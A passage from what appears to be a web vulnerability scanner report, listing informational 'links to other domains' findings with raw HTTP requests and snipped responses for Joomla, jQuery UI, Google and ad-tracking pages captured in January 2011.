Content-Length: 38568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-reporting" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.85. http://joomlacode.org/gf/project/joomla/scmsvn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/scmsvn/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/joomla/scmsvn/?action=browse&path=%2Fdevelopment%2F

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-scmsvn
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://svnbook.red-bean.com/en/1.2/index.html
http://viewvc.tigris.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/joomla/scmsvn/?action=browse&path=%2Fdevelopment%2F HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-scmsvn" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<li ><a href="http://svnbook.red-bean.com/en/1.2/index.html" target="_blank">SVN Reference</a>
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<td>Powered by <a href="http://viewvc.tigris.org/">ViewVC 1.0.0</a>
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.86. http://joomlacode.org/gf/project/joomla/tracker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/joomla/tracker/?action=TrackersReport

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/es/help.php?section=project-tracker
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.rochenhost.com/

Request

GET /gf/project/joomla/tracker/?action=TrackersReport HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:15:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2048507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-tracker" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
<a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...

20.87. http://joomlacode.org/gf/project/mambot_google1/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/mambot_google1/news/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/mambot_google1/news/?action=NewsThreadView&id=3275

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-news
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/mambot_google1/news/?action=NewsThreadView&id=3275 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:43:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.88. http://joomlacode.org/gf/project/opengallery/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/opengallery/news/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/opengallery/news/?action=NewsThreadView&id=3278

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-news
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/opengallery/news/?action=NewsThreadView&id=3278 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:37:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.89. http://joomlacode.org/gf/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/search/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/search/?action=SearchById

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/search/?action=SearchById HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:13:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.90. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The page was loaded from a URL containing a query string:

http://jqueryui.com/themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css
http://docs.jquery.com/Donate
http://jquery.com/
http://jquery.org/
http://plugins.jquery.com/
http://static.jquery.com/ui/css/base2.css
http://static.jquery.com/ui/themeroller/app_css/app_screen.css
http://static.jquery.com/ui/themeroller/scripts/app.js
http://www.filamentgroup.com/

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120026

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bg
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">© 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

20.91. http://linkhelp.clients.google.com/tbproxy/lh/fixurl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://linkhelp.clients.google.com
Path:	/tbproxy/lh/fixurl

Issue detail

The page was loaded from a URL containing a query string:

http://linkhelp.clients.google.com/tbproxy/lh/fixurl?hl=en-US&sd=com&url=http%3A%2F%2Fwww.traderpub.com%2Fx22&sourceid=chrome&error=http404

The response contains the following link to another domain:

http://www.traderpub.com/

Request

GET /tbproxy/lh/fixurl?hl=en-US&sd=com&url=http%3A%2F%2Fwww.traderpub.com%2Fx22&sourceid=chrome&error=http404 HTTP/1.1
Host: linkhelp.clients.google.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:25 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: linkdoctor/fixurlserver
X-XSS-Protection: 1; mode=block
Content-Length: 6358

<!DOCTYPE html><html lang="en" ><meta charset="utf-8" /><title>Oops! This link appears to be broken - www.traderpub.com/x22</title><script type="text/javascript">(function(){function a(d){this.t={};th
...[SNIP]...
<li>Go to <a href="http://www.traderpub.com/" onmousedown="return rwctrd(this,'hs','0','http://www.google.com/url?sa=D&q=http://www.traderpub.com/&usg=AFQjCNFnKst7CsdJFClQ2BYJjWTFPl4LBw');"><b>
...[SNIP]...

20.92. http://loadus.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://loadus.exelator.com
Path:	/load/

Issue detail

The page was loaded from a URL containing a query string:

http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?id=285379&data=245001&id=716806&data=245001&id=199372&data=245001&id=302775&data=245001&id=716807&data=245001&t=2
http://www.googleadservices.com/pagead/conversion/1027512774/?label=vx5_CJzR0gEQxrP66QM&guid=ON&script=0

Request

Response

20.93. http://loadus.exelator.com/load/net.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://loadus.exelator.com
Path:	/load/net.php

Issue detail

The page was loaded from a URL containing a query string:

